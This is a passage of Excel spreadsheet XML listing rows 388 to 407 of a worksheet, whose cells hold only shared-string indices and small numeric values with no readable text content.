      <c r="M388" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N388" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O388" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P388" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q388" s="12">
        <v>2.6</v>
      </c>
      <c r="R388" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S388" s="12" t="s">
        <v>3159</v>
      </c>
      <c r="T388" s="12" t="s">
        <v>3160</v>
      </c>
      <c r="U388" s="12" t="s">
        <v>3045</v>
      </c>
      <c r="V388" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W388" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X388" s="12">
        <v>15</v>
      </c>
      <c r="Y388" s="12" t="s">
        <v>3161</v>
      </c>
    </row>
    <row r="389" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A389" s="12">
        <v>1487</v>
      </c>
      <c r="B389" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C389" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D389" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E389" s="12" t="s">
        <v>31463</v>
      </c>
      <c r="F389" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G389" s="12" t="s">
        <v>3163</v>
      </c>
      <c r="H389" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I389" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J389" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K389" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L389" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M389" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N389" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O389" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P389" s="12" t="s">
        <v>3164</v>
      </c>
      <c r="Q389" s="12">
        <v>2.6</v>
      </c>
      <c r="R389" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S389" s="12" t="s">
        <v>3165</v>
      </c>
      <c r="T389" s="12" t="s">
        <v>2572</v>
      </c>
      <c r="U389" s="12" t="s">
        <v>3166</v>
      </c>
      <c r="V389" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W389" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X389" s="12">
        <v>6</v>
      </c>
      <c r="Y389" s="12" t="s">
        <v>3167</v>
      </c>
    </row>
    <row r="390" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A390" s="12">
        <v>1488</v>
      </c>
      <c r="B390" s="12" t="s">
        <v>29785</v>
      </c>
      <c r="C390" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D390" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F390" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G390" s="12" t="s">
        <v>3168</v>
      </c>
      <c r="H390" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I390" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J390" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K390" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L390" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M390" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N390" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O390" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P390" s="12" t="s">
        <v>3169</v>
      </c>
      <c r="Q390" s="12">
        <v>2.5</v>
      </c>
      <c r="R390" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S390" s="12" t="s">
        <v>3170</v>
      </c>
      <c r="T390" s="12" t="s">
        <v>3171</v>
      </c>
      <c r="U390" s="12" t="s">
        <v>3172</v>
      </c>
      <c r="V390" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W390" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X390" s="12">
        <v>8</v>
      </c>
      <c r="Y390" s="12" t="s">
        <v>3173</v>
      </c>
    </row>
    <row r="391" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A391" s="12">
        <v>1492</v>
      </c>
      <c r="B391" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D391" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F391" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G391" s="12" t="s">
        <v>3177</v>
      </c>
      <c r="H391" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I391" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J391" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K391" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L391" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M391" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N391" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O391" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P391" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q391" s="12">
        <v>2.6</v>
      </c>
      <c r="R391" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S391" s="12" t="s">
        <v>3178</v>
      </c>
      <c r="T391" s="12" t="s">
        <v>3179</v>
      </c>
      <c r="U391" s="12" t="s">
        <v>3180</v>
      </c>
      <c r="V391" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W391" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X391" s="12">
        <v>2</v>
      </c>
      <c r="Y391" s="12" t="s">
        <v>3181</v>
      </c>
    </row>
    <row r="392" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A392" s="12">
        <v>1494</v>
      </c>
      <c r="B392" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C392" s="12" t="s">
        <v>29790</v>
      </c>
      <c r="D392" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E392" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F392" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G392" s="12" t="s">
        <v>3182</v>
      </c>
      <c r="H392" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I392" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J392" s="12" t="s">
        <v>342</v>
      </c>
      <c r="K392" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L392" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M392" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N392" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O392" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P392" s="12" t="s">
        <v>3183</v>
      </c>
      <c r="Q392" s="12">
        <v>2.5</v>
      </c>
      <c r="R392" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S392" s="12" t="s">
        <v>3184</v>
      </c>
      <c r="T392" s="12" t="s">
        <v>2886</v>
      </c>
      <c r="U392" s="12" t="s">
        <v>3185</v>
      </c>
      <c r="V392" s="12" t="s">
        <v>1935</v>
      </c>
      <c r="W392" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X392" s="12">
        <v>7</v>
      </c>
      <c r="Y392" s="12" t="s">
        <v>3186</v>
      </c>
    </row>
    <row r="393" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A393" s="12">
        <v>1505</v>
      </c>
      <c r="B393" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D393" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F393" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G393" s="12" t="s">
        <v>3193</v>
      </c>
      <c r="H393" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I393" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J393" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K393" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L393" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M393" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N393" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O393" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P393" s="12" t="s">
        <v>3194</v>
      </c>
      <c r="Q393" s="12">
        <v>2.6</v>
      </c>
      <c r="R393" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S393" s="12" t="s">
        <v>3195</v>
      </c>
      <c r="T393" s="12" t="s">
        <v>3196</v>
      </c>
      <c r="U393" s="12" t="s">
        <v>3197</v>
      </c>
      <c r="V393" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W393" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X393" s="12">
        <v>4</v>
      </c>
      <c r="Y393" s="12" t="s">
        <v>3198</v>
      </c>
    </row>
    <row r="394" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A394" s="12">
        <v>1510</v>
      </c>
      <c r="B394" s="12" t="s">
        <v>28658</v>
      </c>
      <c r="D394" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F394" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G394" s="12" t="s">
        <v>3199</v>
      </c>
      <c r="H394" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I394" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J394" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K394" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L394" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M394" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N394" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O394" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P394" s="12" t="s">
        <v>3200</v>
      </c>
      <c r="Q394" s="12">
        <v>2.4</v>
      </c>
      <c r="R394" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S394" s="12" t="s">
        <v>3201</v>
      </c>
      <c r="T394" s="12" t="s">
        <v>2491</v>
      </c>
      <c r="U394" s="12" t="s">
        <v>3202</v>
      </c>
      <c r="V394" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W394" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X394" s="12">
        <v>8</v>
      </c>
      <c r="Y394" s="12" t="s">
        <v>3203</v>
      </c>
    </row>
    <row r="395" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A395" s="12">
        <v>1511</v>
      </c>
      <c r="B395" s="12" t="s">
        <v>28661</v>
      </c>
      <c r="C395" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D395" s="12" t="s">
        <v>28662</v>
      </c>
      <c r="F395" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G395" s="12" t="s">
        <v>3204</v>
      </c>
      <c r="H395" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I395" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J395" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K395" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L395" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M395" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N395" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O395" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P395" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q395" s="12">
        <v>2.6</v>
      </c>
      <c r="R395" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S395" s="12" t="s">
        <v>3205</v>
      </c>
      <c r="T395" s="12" t="s">
        <v>3206</v>
      </c>
      <c r="U395" s="12" t="s">
        <v>1806</v>
      </c>
      <c r="V395" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W395" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X395" s="12">
        <v>1</v>
      </c>
      <c r="Y395" s="12" t="s">
        <v>3207</v>
      </c>
    </row>
    <row r="396" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A396" s="12">
        <v>1514</v>
      </c>
      <c r="B396" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C396" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D396" s="12" t="s">
        <v>28663</v>
      </c>
      <c r="F396" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G396" s="12" t="s">
        <v>3208</v>
      </c>
      <c r="H396" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I396" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J396" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K396" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L396" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M396" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N396" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O396" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P396" s="12" t="s">
        <v>3209</v>
      </c>
      <c r="Q396" s="12">
        <v>2.4</v>
      </c>
      <c r="R396" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S396" s="12" t="s">
        <v>3210</v>
      </c>
      <c r="T396" s="12" t="s">
        <v>3211</v>
      </c>
      <c r="U396" s="12" t="s">
        <v>3212</v>
      </c>
      <c r="V396" s="12" t="s">
        <v>3213</v>
      </c>
      <c r="W396" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X396" s="12">
        <v>1</v>
      </c>
      <c r="Y396" s="12" t="s">
        <v>3214</v>
      </c>
    </row>
    <row r="397" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A397" s="12">
        <v>1521</v>
      </c>
      <c r="B397" s="12" t="s">
        <v>28664</v>
      </c>
      <c r="C397" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D397" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E397" s="12" t="s">
        <v>31434</v>
      </c>
      <c r="F397" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G397" s="12" t="s">
        <v>3215</v>
      </c>
      <c r="H397" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I397" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J397" s="12" t="s">
        <v>81</v>
      </c>
      <c r="K397" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L397" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M397" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N397" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O397" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P397" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q397" s="12">
        <v>2.6</v>
      </c>
      <c r="R397" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S397" s="12" t="s">
        <v>3216</v>
      </c>
      <c r="T397" s="12" t="s">
        <v>3217</v>
      </c>
      <c r="U397" s="12" t="s">
        <v>3218</v>
      </c>
      <c r="V397" s="12" t="s">
        <v>84</v>
      </c>
      <c r="W397" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X397" s="12">
        <v>26</v>
      </c>
      <c r="Y397" s="12" t="s">
        <v>3219</v>
      </c>
    </row>
    <row r="398" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A398" s="12">
        <v>1525</v>
      </c>
      <c r="B398" s="12" t="s">
        <v>28665</v>
      </c>
      <c r="D398" s="12" t="s">
        <v>28666</v>
      </c>
      <c r="E398" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F398" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G398" s="12" t="s">
        <v>3220</v>
      </c>
      <c r="H398" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I398" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J398" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K398" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L398" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M398" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N398" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O398" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P398" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q398" s="12">
        <v>2.6</v>
      </c>
      <c r="R398" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S398" s="12" t="s">
        <v>3222</v>
      </c>
      <c r="T398" s="12" t="s">
        <v>3223</v>
      </c>
      <c r="U398" s="12" t="s">
        <v>3224</v>
      </c>
      <c r="V398" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W398" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X398" s="12">
        <v>3</v>
      </c>
      <c r="Y398" s="12" t="s">
        <v>3225</v>
      </c>
    </row>
    <row r="399" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A399" s="12">
        <v>1530</v>
      </c>
      <c r="B399" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D399" s="12" t="s">
        <v>28668</v>
      </c>
      <c r="E399" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F399" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G399" s="12" t="s">
        <v>28667</v>
      </c>
      <c r="H399" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I399" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J399" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K399" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L399" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M399" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N399" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O399" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P399" s="12" t="s">
        <v>3230</v>
      </c>
      <c r="Q399" s="12">
        <v>2.6</v>
      </c>
      <c r="R399" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S399" s="12" t="s">
        <v>3231</v>
      </c>
      <c r="T399" s="12" t="s">
        <v>3232</v>
      </c>
      <c r="U399" s="12" t="s">
        <v>3233</v>
      </c>
      <c r="V399" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W399" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X399" s="12">
        <v>29</v>
      </c>
      <c r="Y399" s="12" t="s">
        <v>3234</v>
      </c>
    </row>
    <row r="400" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A400" s="12">
        <v>1533</v>
      </c>
      <c r="B400" s="12" t="s">
        <v>28670</v>
      </c>
      <c r="D400" s="12" t="s">
        <v>28671</v>
      </c>
      <c r="E400" s="12" t="s">
        <v>31464</v>
      </c>
      <c r="F400" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G400" s="12" t="s">
        <v>3235</v>
      </c>
      <c r="H400" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I400" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J400" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K400" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L400" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M400" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N400" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O400" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P400" s="12" t="s">
        <v>3236</v>
      </c>
      <c r="Q400" s="12">
        <v>2.4</v>
      </c>
      <c r="R400" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S400" s="12" t="s">
        <v>3237</v>
      </c>
      <c r="T400" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U400" s="12" t="s">
        <v>2859</v>
      </c>
      <c r="V400" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W400" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X400" s="12">
        <v>12</v>
      </c>
      <c r="Y400" s="12" t="s">
        <v>3238</v>
      </c>
    </row>
    <row r="401" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A401" s="12">
        <v>1536</v>
      </c>
      <c r="B401" s="12" t="s">
        <v>28672</v>
      </c>
      <c r="D401" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E401" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F401" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G401" s="12" t="s">
        <v>3239</v>
      </c>
      <c r="H401" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I401" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J401" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K401" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L401" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M401" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N401" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O401" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P401" s="12" t="s">
        <v>3240</v>
      </c>
      <c r="Q401" s="12">
        <v>2.4</v>
      </c>
      <c r="R401" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S401" s="12" t="s">
        <v>3241</v>
      </c>
      <c r="T401" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="U401" s="12" t="s">
        <v>3242</v>
      </c>
      <c r="V401" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W401" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X401" s="12">
        <v>8</v>
      </c>
      <c r="Y401" s="12" t="s">
        <v>3243</v>
      </c>
    </row>
    <row r="402" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A402" s="12">
        <v>1537</v>
      </c>
      <c r="B402" s="12" t="s">
        <v>28670</v>
      </c>
      <c r="D402" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F402" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G402" s="12" t="s">
        <v>3244</v>
      </c>
      <c r="H402" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I402" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J402" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K402" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L402" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M402" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N402" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O402" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P402" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q402" s="12">
        <v>2.6</v>
      </c>
      <c r="R402" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S402" s="12" t="s">
        <v>3245</v>
      </c>
      <c r="T402" s="12" t="s">
        <v>3246</v>
      </c>
      <c r="U402" s="12" t="s">
        <v>3247</v>
      </c>
      <c r="V402" s="12" t="s">
        <v>1285</v>
      </c>
      <c r="W402" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X402" s="12">
        <v>7</v>
      </c>
      <c r="Y402" s="12" t="s">
        <v>3248</v>
      </c>
    </row>
    <row r="403" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A403" s="12">
        <v>1548</v>
      </c>
      <c r="B403" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C403" s="12" t="s">
        <v>28673</v>
      </c>
      <c r="D403" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F403" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G403" s="12" t="s">
        <v>3250</v>
      </c>
      <c r="H403" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I403" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J403" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K403" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L403" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M403" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N403" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O403" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P403" s="12" t="s">
        <v>3251</v>
      </c>
      <c r="Q403" s="12">
        <v>2.6</v>
      </c>
      <c r="R403" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S403" s="12" t="s">
        <v>3252</v>
      </c>
      <c r="T403" s="12" t="s">
        <v>3253</v>
      </c>
      <c r="U403" s="12" t="s">
        <v>3254</v>
      </c>
      <c r="V403" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W403" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X403" s="12">
        <v>2</v>
      </c>
      <c r="Y403" s="12" t="s">
        <v>3255</v>
      </c>
    </row>
    <row r="404" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A404" s="12">
        <v>1552</v>
      </c>
      <c r="B404" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C404" s="12" t="s">
        <v>28674</v>
      </c>
      <c r="D404" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F404" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G404" s="12" t="s">
        <v>3262</v>
      </c>
      <c r="H404" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I404" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J404" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K404" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L404" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M404" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N404" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O404" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P404" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q404" s="12">
        <v>2.6</v>
      </c>
      <c r="R404" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S404" s="12" t="s">
        <v>3263</v>
      </c>
      <c r="T404" s="12" t="s">
        <v>3264</v>
      </c>
      <c r="U404" s="12" t="s">
        <v>3265</v>
      </c>
      <c r="V404" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W404" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X404" s="12">
        <v>9</v>
      </c>
      <c r="Y404" s="12" t="s">
        <v>3266</v>
      </c>
    </row>
    <row r="405" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A405" s="12">
        <v>1554</v>
      </c>
      <c r="B405" s="12" t="s">
        <v>28675</v>
      </c>
      <c r="D405" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F405" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G405" s="12" t="s">
        <v>3267</v>
      </c>
      <c r="H405" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I405" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J405" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K405" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L405" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M405" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N405" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O405" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P405" s="12" t="s">
        <v>2528</v>
      </c>
      <c r="Q405" s="12">
        <v>2.6</v>
      </c>
      <c r="R405" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S405" s="12" t="s">
        <v>3268</v>
      </c>
      <c r="T405" s="12" t="s">
        <v>2858</v>
      </c>
      <c r="U405" s="12" t="s">
        <v>3269</v>
      </c>
      <c r="V405" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W405" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X405" s="12">
        <v>4</v>
      </c>
      <c r="Y405" s="12" t="s">
        <v>3270</v>
      </c>
    </row>
    <row r="406" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A406" s="12">
        <v>1558</v>
      </c>
      <c r="B406" s="12" t="s">
        <v>28676</v>
      </c>
      <c r="D406" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E406" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F406" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G406" s="12" t="s">
        <v>3271</v>
      </c>
      <c r="H406" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I406" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J406" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K406" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L406" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M406" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N406" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O406" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P406" s="12" t="s">
        <v>2999</v>
      </c>
      <c r="Q406" s="12">
        <v>2.6</v>
      </c>
      <c r="R406" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S406" s="12" t="s">
        <v>3272</v>
      </c>
      <c r="T406" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U406" s="12" t="s">
        <v>3273</v>
      </c>
      <c r="V406" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W406" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X406" s="12">
        <v>2</v>
      </c>
      <c r="Y406" s="12" t="s">
        <v>3274</v>
      </c>
    </row>
    <row r="407" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A407" s="12">
        <v>1562</v>
      </c>
      <c r="B407" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D407" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F407" s="12" t="s">
        <v>29744</v>
      </c>
      <c r="G407" s="12" t="s">
        <v>3275</v>
      </c>
      <c r="H407" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I407" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J407" s="12" t="s">
        <v>28</v>
      </c>
